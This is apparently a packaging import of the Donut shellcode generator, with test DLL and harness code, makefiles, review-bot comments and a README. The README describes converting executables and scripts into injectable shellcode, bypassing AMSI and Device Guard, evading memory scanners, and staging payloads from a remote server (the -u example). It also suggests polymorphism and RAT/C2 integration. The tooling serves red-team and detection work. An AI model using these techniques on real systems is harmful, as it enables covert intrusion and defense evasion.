Codebase list donut-shellcode / caa7b83
New upstream version 0.9.2 Sophie Brun 4 years ago
81 changed file(s) with 15998 addition(s) and 0 deletion(s). Raw diff Collapse all Expand all
0 #define UNICODE
1
2 #include <stdint.h>
3 #include <stdio.h>
4 #include <stdlib.h>
5 #include <string.h>
6 #include <sys/stat.h>
7 #include <inttypes.h>
8
9 #include <windows.h>
10 #pragma comment(lib, "user32.lib")
11 #pragma comment(lib, "shell32.lib")
12
13 __declspec(dllexport)
14 VOID WINAPI RunProcess(PWCHAR proc1, PWCHAR proc2) {
15 PROCESS_INFORMATION pi;
16 STARTUPINFO si;
17
18 ZeroMemory(&si, sizeof(si));
19 si.cb = sizeof(si);
20 CreateProcess(NULL, proc1, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
21
22 ZeroMemory(&si, sizeof(si));
23 si.cb = sizeof(si);
24 CreateProcess(NULL, proc2, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
25 }
26
27 __declspec(dllexport)
28 VOID WINAPI DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
29 WCHAR msg[4096];
30
31 _snwprintf(msg, ARRAYSIZE(msg),
32 L"param[0] : %ws\r"
33 L"param[1] : %ws\r"
34 L"param[2] : %ws\r"
35 L"param[3] : %ws\r",
36 arg0, arg1, arg2, arg3);
37
38 MessageBox(NULL, msg, L"Donut Test", MB_OK);
39 }
40
41 __declspec(dllexport)
42 BOOL WINAPI DllMain(HMODULE hModule,
43 DWORD ul_reason_for_call,
44 LPVOID lpReserved) {
45 switch (ul_reason_for_call) {
46 case DLL_PROCESS_ATTACH:
47 MessageBox(NULL, L"Hello, World!", L"Hello, World!", 0);
48 break;
49 case DLL_THREAD_ATTACH:
50 case DLL_THREAD_DETACH:
51 case DLL_PROCESS_DETACH:
52 break;
53 }
54 return TRUE;
55 }
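Review bot: RunProcess (gutter 14–25) ignores the result of both CreateProcess calls and never closes the handles returned in pi, so every launch that succeeds leaks pi.hProcess and pi.hThread into the host process for the lifetime of the injected DLL; since pi is only written on success, guard the cleanup on the return value, e.g. `if (CreateProcess(NULL, proc1, ...)) { CloseHandle(pi.hThread); CloseHandle(pi.hProcess); }` for each call. In DonutApiW, `_snwprintf(msg, ARRAYSIZE(msg), ...)` (gutter 31) does not NUL-terminate when the formatted text fills the whole buffer, so four long parameters would hand MessageBox an unterminated string; append `msg[ARRAYSIZE(msg) - 1] = L'\0';` or pass `ARRAYSIZE(msg) - 1` as the count. DllMain also pops a MessageBox from DLL_PROCESS_ATTACH (gutter 47), which runs under the loader lock and is discouraged by the DllMain documentation because it can deadlock; tolerable in a test DLL, but a one-line comment saying it is deliberate would help.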
0
1
2 // just some simple test cases to use with donut library
3
4 #include "donut.h"
5
6 typedef struct _test_case_t {
7 int arch;
8 int bypass;
9 int inst_type;
10 char *domain;
11 char *cls;
12 char *method;
13 char *param;
14 char *file;
15 char *url;
16 char *runtime;
17 int err; // expected result based on test case
18 } test_case;
19
20 test_case tests[] = {
21 // nothing supplied
22 {0,0,0,"","","","","","","",DONUT_ERROR_INVALID_PARAMETER},
23 // requesting x86 shellcode for x64 DLL
24 {DONUT_ARCH_X86,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","cls","method","param","hello_amd64.dll","","",DONUT_ERROR_ARCH_MISMATCH},
25 // requesting x64 shellcode for x86 DLL
26 {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","","","hello_x86.dll","","",DONUT_ERROR_ARCH_MISMATCH},
27 // supplying parameters for unmanaged DLL, but not function name
28 {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","","calc.exe,notepad.exe","hello_amd64.dll","","",DONUT_ERROR_DLL_PARAM},
29 // supplying function name that can't be found in DLL
30 {DONUT_ARCH_X64,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","NoMethod","calc.exe,notepad.exe","hello_amd64.dll","","",DONUT_ERROR_DLL_FUNCTION},
31 // supplying file that isn't recognized
32 {DONUT_ARCH_ANY,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"","","","","/dev/null","","",DONUT_ERROR_FILE_INVALID},
33 // .NET DLL assembly with no method provided
34 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","TestClass","","","class1.dll","","",DONUT_ERROR_NET_PARAMS},
35 // .NET DLL assembly with no class provided
36 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","","RunProcess","calc.exe,notepad.exe","class1.dll","","",DONUT_ERROR_NET_PARAMS},
37 // .NET DLL with good parameters
38 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_PIC,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","","",DONUT_ERROR_SUCCESS},
39 // invalid URL
40 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","http:","",DONUT_ERROR_INVALID_URL},
41 // invalid URL length
42 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","http://","",DONUT_ERROR_URL_LENGTH},
43 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","https://","",DONUT_ERROR_URL_LENGTH},
44 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll","https://a","",DONUT_ERROR_SUCCESS},
45 {DONUT_ARCH_X84,DONUT_BYPASS_CONTINUE,DONUT_INSTANCE_URL,"domain","TestClass","RunProcess","calc.exe,notepad.exe","class1.dll",
46 "https://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
47 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
48 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
49 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
50 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
51 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
52 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
53 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
54 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
55 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
56 "",DONUT_ERROR_URL_LENGTH},
57 };
58
59 int main(void)
60 {
61 DONUT_CONFIG c;
62 int err, i;
63
64 for(i=0; i<sizeof(tests)/sizeof(test_case); i++) {
65 memset(&c, 0, sizeof(c));
66
67 c.arch = tests[i].arch;
68 c.bypass = tests[i].bypass;
69 c.inst_type = tests[i].inst_type;
70
71 strncpy(c.domain , tests[i].domain, sizeof(c.domain) - 1);
72 strncpy(c.cls , tests[i].cls, sizeof(c.cls) - 1);
73 strncpy(c.method , tests[i].method, sizeof(c.method) - 1);
74 strncpy(c.param , tests[i].param, sizeof(c.param) - 1);
75 strncpy(c.file , tests[i].file, sizeof(c.file) - 1);
76 strncpy(c.url , tests[i].url, sizeof(c.url) - 1);
77 strncpy(c.runtime, tests[i].runtime, sizeof(c.runtime) - 1);
78
79 printf("Test Case # %2i ", (i+1));
80 err = DonutCreate(&c);
81 DonutDelete(&c);
82
83 printf("returned %2i : %s\n",
84 err, err == tests[i].err ? "OK" : "FAILED");
85 }
86 return 0;
87 }
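Review bot: main (gutter 59–87) prints OK/FAILED for each case but always returns 0, so a regression in DonutCreate's parameter validation can never fail a build or CI run; count the mismatches with `if (err != tests[i].err) failed++;` inside the loop and finish with `return failed ? 1 : 0;`. Note also that the strncpy at gutter 76 truncates the long-URL case to `sizeof(c.url) - 1` bytes before DonutCreate ever sees it, so the DONUT_ERROR_URL_LENGTH expectation at gutter 56 only holds if DonutCreate's limit is below that truncated length — presumably it is, but a comment on the test case stating that assumption would save the next reader a trip into donut.c.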
0 BSD 3-Clause License
1
2 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
3
4 Redistribution and use in source and binary forms, with or without
5 modification, are permitted provided that the following conditions are met:
6
7 * Redistributions of source code must retain the above copyright notice, this
8 list of conditions and the following disclaimer.
9
10 * Redistributions in binary form must reproduce the above copyright notice,
11 this list of conditions and the following disclaimer in the documentation
12 and/or other materials provided with the distribution.
13
14 * Neither the name of the copyright holder nor the names of its
15 contributors may be used to endorse or promote products derived from
16 this software without specific prior written permission.
17
18 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
19 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
20 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
21 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
22 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
23 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
24 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
25 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
26 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
27 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
0 include README.md
1 include Makefile*
2 include LICENSE
3 include version-release-notes.txt
4 recursive-include . *.c
5 recursive-include payload *
6 recursive-include include *
7 recursive-include docs *
8 recursive-include lib *
0 donut:
1 gcc -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut
2 gcc -Wall -c -fpack-struct=8 -fPIC -I include donut.c hash.c encrypt.c payload/clib.c
3 ar rcs lib/libdonut.a donut.o hash.o encrypt.o clib.o
4 gcc -Wall -shared -o lib/libdonut.so donut.o hash.o encrypt.o clib.o
5 debug:
6 gcc -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut
7 clean:
8 rm *.o donut lib/libdonut.a lib/libdonut.so
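Review bot: The `donut` target (gutter 0) has no prerequisites and writes a file literally named `donut` (`-odonut`, gutter 1), so once that file exists `make` reports it up to date and silently skips rebuilding after donut.c, hash.c or encrypt.c change — and a stale `make debug` binary will be kept for the same reason. Declare the rule targets phony with `.PHONY: donut debug clean` at the top of the file, or list the sources as prerequisites of `donut`. The `clean` rule (gutter 8) calls `rm` without `-f`, so on a fresh tree `make clean` fails at the first missing file; `rm -f *.o donut lib/libdonut.a lib/libdonut.so` avoids that.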
0 donut:
1 x86_64-w64-mingw32-gcc -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut.exe
2 debug:
3 x86_64-w64-mingw32-gcc -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c -odonut.exe
4 clean:
5 rm donut.exe *.o
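Review bot: The clean rule `rm donut.exe *.o` (gutter 5) runs without `-f`, and neither build rule above produces object files (both compile and link in one step with `-odonut.exe`), so `*.o` never matches and `make clean` exits non-zero every time; use `rm -f donut.exe *.o`. Adding `.PHONY: donut debug clean` would also keep a stray file named `donut` or `debug` from shadowing the targets.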
0 donut:
1 cl -Zp8 -nologo -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c
2 cl -Zp8 -nologo -DDLL -LD -I include donut.c hash.c encrypt.c payload/clib.c
3 move donut.lib lib/donut.lib
4 move donut.exp lib/donut.exp
5 move donut.dll lib/donut.dll
6 debug:
7 cl -Zp8 -nologo -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c
8 cl -Zp8 -nologo -DDEBUG -DDLL -LD -I include donut.c hash.c encrypt.c payload/clib.c
9 move donut.lib lib/donut.lib
10 move donut.exp lib/donut.exp
11 move donut.dll lib/donut.dll
12 clean:
13 del *.obj *.bin donut.exe lib/donut.exp lib/donut.lib lib/donut.dll
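Review bot: The clean rule (gutter 13) passes forward-slash paths such as `lib/donut.exp` to cmd.exe's built-in `del`, which treats `/` as a switch introducer and is likely to abort with "Invalid switch" rather than delete anything — verify on a Windows shell, and if so use `del *.obj *.bin donut.exe lib\donut.exp lib\donut.lib lib\donut.dll`. The `move` lines at gutter 3–5 and 9–11 also stop the build if `lib` does not exist yet; a `if not exist lib mkdir lib` before them would make a fresh checkout build cleanly.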
0 Metadata-Version: 2.1
1 Name: donut-shellcode
2 Version: 0.9.2
3 Summary: Donut Python C extension
4 Home-page: https://github.com/TheWover/donut
5 Author: TheWover, Odzhan, byt3bl33d3r
6 License: UNKNOWN
7 Description: # Using Donut
8
9 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
10
11 Version: 0.9.2 *please submit issues and requests for v1.0 release*
12
13 Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
14
15 TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
16
17 v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/
18
19 ## Introduction
20
21 Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
22
23 It can be used in several ways.
24
25 ## As a Standalone Tool
26
27 Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.
28
29 ```
30
31 usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>
32
33 -MODULE OPTIONS-
34
35 -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.
36 -u <URL> HTTP server that will host the donut module.
37
38 -PIC/SHELLCODE OPTIONS-
39
40 -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
41 -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
42 -o <payload> Output file. Default is "payload.bin"
43
44 -DOTNET OPTIONS-
45
46 -c <namespace.class> Optional class name. (required for .NET DLL)
47 -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)
48 -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
49 -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
50 -d <name> AppDomain name to create for .NET. Randomly generated by default.
51
52 examples:
53
54 donut -f c2.dll
55 donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
56 donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/
57
58 ```
59
60 ### Building Donut
61
62 Tags have been provided for each release version of donut that contain the compiled executables.
63
64 * v0.9.2, Bear Claw:
65 * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
66 * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
67 * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9
68
69 However, you may also clone and build the source yourself using the provided makefiles.
70
71 ## Building From Repository
72
73 From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
74
75 ```
76 git clone http://github.com/thewover/donut
77 cd donut
78 ```
79
80 ## Linux
81
82 Simply run make to generate an executable, static and dynamic libraries.
83
84 ```
85 make
86 make clean
87 make debug
88 ```
89
90 ## Windows
91
92 Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:
93
94 ```
95 nmake -f Makefile.msvc
96 nmake clean -f Makefile.msvc
97 nmake debug -f Makefile.msvc
98 ```
99
100 ## As a Library
101
102 donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
103
104 ## As a Python Module
105
106 Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
107
108 ```
109 pip install .
110 ```
111
112 Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
113
114 ```
115 pip install donut-shellcode
116 ```
117
118 ## As a Template - Rebuilding the shellcode
119
120 *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut.
121
122 ### Microsoft Visual Studio
123
124 **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**
125
126 Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
127
128 ```
129 nmake clean -f Makefile.msvc
130 nmake -f Makefile.msvc
131 ```
132
133 This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
134
135 To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
136
137 ```
138 nmake clean -f Makefile.msvc
139 nmake x86 -f Makefile.msvc
140 ```
141
142 This will save the shellcode as a C array to *payload_exe_x86.h*.
143
144 ### Mingw-w64
145
146 Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
147
148 ```
149 make clean -f Makefile.mingw
150 make -f Makefile.mingw
151 ```
152
153 Once you've recompiled for all architectures, you may rebuild donut.
154
155 ## Bypasses
156
157 Donut includes a bypass system for AMSI and other security features. Currently we bypass:
158
159 * AMSI in .NET v4.8
160 * Device Guard policy preventing dynamicly generated code from executing
161
162 You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c.
163
164 Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.
165
166 Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
167
168 Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
169
170 If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
171
172 Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.
173
174 ### Additional features.
175
176 These are left as exercises to the reader. I would personally recommend:
177
178 * Add environmental keying
179 * Make donut polymorphic by obfuscating *payload* every time shellcode is generated
180 * Integrate donut as a module into your favorite RAT/C2 Framework
181
182 ## Disclaimers
183
184 * No, we will not update donut to counter signatures or detections by any AV.
185 * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.
186
187 # How it works
188
189 ## Procedure for Assemblies
190
191 Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
192
193 The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
194
195 Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
196
197 For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
198
199 Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.
200
201 ## Procedure for ActiveScript/XSL
202
203 The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).
204
205 ## Procedure for PE Loading
206
207 The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).
208
209 ## Components
210
211 Donut contains the following elements:
212
213 * donut.c: The source code for the donut payload generator
214 * donut.exe: The compiled payload generator as an EXE
215 * donut.py: The donut payload generator as a Python script *(planned for version 1.0)*
216 * donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
217 * setup.py: The setup file for installing Donut as a Pip Python3 module.
218 * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform
219 * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform
220 * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project
221 * payload/payload.c: Main file for the shellcode.
222 * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
223 * payload/inmem_pe.c: In-Memory loader for EXE/DLL files.
224 * payload/inmem_xml.c: In-Memory loader for XSL/XML files.
225 * payload/inmem_script.c: In-Memory loader for VBScript/JScript files.
226 * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
227 * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support.
228 * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP)
229 * payload/http_client.c: Downloads a module from remote staging server into memory.
230 * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
231 * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
232 * payload/inject.exe: The compiled C shellcode injector
233 * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing.
234 * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible
235 * payload/runsc.exe: The compiled C shellcode runner
236 * payload/exe2h/exe2h.c: Source code for exe2h
237 * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file
238 * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
239 * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
240
241 # Subprojects
242
243 There are three companion projects provided with donut:
244
245 * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
246 * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
247 * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
248 * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.
249
250 # Project plan
251
252 * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
253 * Create a C# version of the generator.
254 * Create a donut.py generator that uses the same command-line parameters as donut.exe.
255 * Add support for HTTP proxies.
256 ~~* Find ways to simplify the shellcode if possible.~~
257 * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it.
258 * ~~Dynamic Calls to DLL functions.~~
259 * Handle the ProcessExit event from AppDomain using unmanaged code.
260
261 Platform: UNKNOWN
262 Requires-Python: >=3.0
263 Description-Content-Type: text/markdown
0 # Using Donut
1
2 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
3
4 Version: 0.9.2 *please submit issues and requests for v1.0 release*
5
6 Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
7
8 TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
9
10 v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/
11
12 ## Introduction
13
14 Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
15
16 It can be used in several ways.
17
18 ## As a Standalone Tool
19
20 Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.
21
22 ```
23
24 usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>
25
26 -MODULE OPTIONS-
27
28 -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.
29 -u <URL> HTTP server that will host the donut module.
30
31 -PIC/SHELLCODE OPTIONS-
32
33 -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
34 -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
35 -o <payload> Output file. Default is "payload.bin"
36
37 -DOTNET OPTIONS-
38
39 -c <namespace.class> Optional class name. (required for .NET DLL)
40 -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)
41 -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
42 -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
43 -d <name> AppDomain name to create for .NET. Randomly generated by default.
44
45 examples:
46
47 donut -f c2.dll
48 donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
49 donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/
50
51 ```
52
53 ### Building Donut
54
55 Tags have been provided for each release version of donut that contain the compiled executables.
56
57 * v0.9.2, Bear Claw:
58 * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
